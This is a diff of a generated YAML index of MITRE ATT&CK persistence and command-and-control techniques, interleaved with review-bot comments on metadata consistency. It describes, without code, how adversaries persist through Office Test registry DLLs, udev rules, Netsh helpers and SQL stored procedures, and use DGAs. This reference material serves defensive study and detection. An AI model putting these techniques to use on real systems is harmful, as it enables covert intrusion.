- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -36742,8 +37120,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -36773,7 +37151,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -36816,7 +37193,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36841,12 +37218,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36886,8 +37262,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -36895,13 +37273,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -36932,17 +37310,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -37005,7 +37380,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -37039,8 +37414,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -37049,6 +37424,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
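Review bot: the URL of the new `Malicious Life by Cybereason` reference carries a `#blog-subscribe` fragment that points at the page's subscription widget rather than the article, and the entry is dated `(n.d.)`; the reference itself does resolve the `(Citation: Malicious Life by Cybereason)` added to the T1053.002 description earlier in this file. Since this file is generated, do not hand-edit it here; report the stray fragment upstream so the next regeneration picks up the cleaned citation.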
@@ -37061,12 +37440,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -37079,6 +37457,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -37115,17 +37494,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
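Review bot: the platform list for T1556 drops Azure AD, Google Workspace and Office 365 in favour of Office Suite and Identity Provider (with x_mitre_version moving from '2.4' to '2.5'); any per-platform index keyed on the old platform names will no longer match this technique, so check that those indexes are regenerated in the same change rather than left listing T1556 under the retired names.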
@@ -37171,9 +37550,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
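Review bot: the added T1546.017 block ends at object_marking_refs and then reuses the existing `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` context lines as its own trailing fields, while the technique that previously owned those lines now ends with the newly inserted `atomic_tests: []` directly after its object_marking_refs; confirm that technique still carries both fields elsewhere in its object, otherwise this hunk silently strips them. Separately, x_mitre_detection lists only `/etc/udev/rules.d/`, `/lib/udev/rules.d/` and /usr/lib/udev/rules.d/ (the last without backticks), whereas the description names five rule directories including `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; file-modification monitoring should cover all five, and the trailing space inside the quoted detection string (`2024) '`) can be dropped.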
@@ -37210,7 +37645,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
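Review bot: `modified` moves backwards here, from 2022-05-11T14:00:00.188Z to 2022-04-20T17:09:17.363Z. The old value shares the `14:00:00.188Z` suffix with several other pre-change timestamps in this diff, which suggests a batch-stamped value being replaced by the upstream STIX timestamp; if so, a one-line note in the commit message that timestamps are resynced from upstream would stop the next reader from taking this as a regression.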
@@ -37234,51 +37669,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -37301,20 +37696,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
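Review bot: x_mitre_permissions_required (Administrator, SYSTEM, root) is removed from T1505.001 with no replacement field, and x_mitre_version is bumped from '1.0' to '1.1' while the description and detection text in the hunk are unchanged; if the bump is driven only by the refreshed NetSPI references (new www.netspi.com URLs, retrieval date September 12, 2024) that is fine, but please confirm the permissions field is intentionally retired rather than lost in the reorder. The Microsoft and Kaspersky references keep their 2019 retrieval dates, which is consistent since their URLs did not change.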
@@ -37344,7 +37776,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -37368,12 +37800,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
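Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1556.004 together with spec_version, and no replacement value is added in the hunk, unlike T1556 earlier in the diff where `x_mitre_attack_spec_version: 3.2.0` is inserted near the top of the object; check that T1556.004 gets the field back somewhere in its object, since its absence would make this technique inconsistent with the rest of the file. The same pattern appears for T1574.012 later in the diff.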
@@ -37457,11 +37887,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -37513,9 +37942,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -37564,7 +37992,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -37602,14 +38030,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -37672,7 +38098,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -37730,97 +38155,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
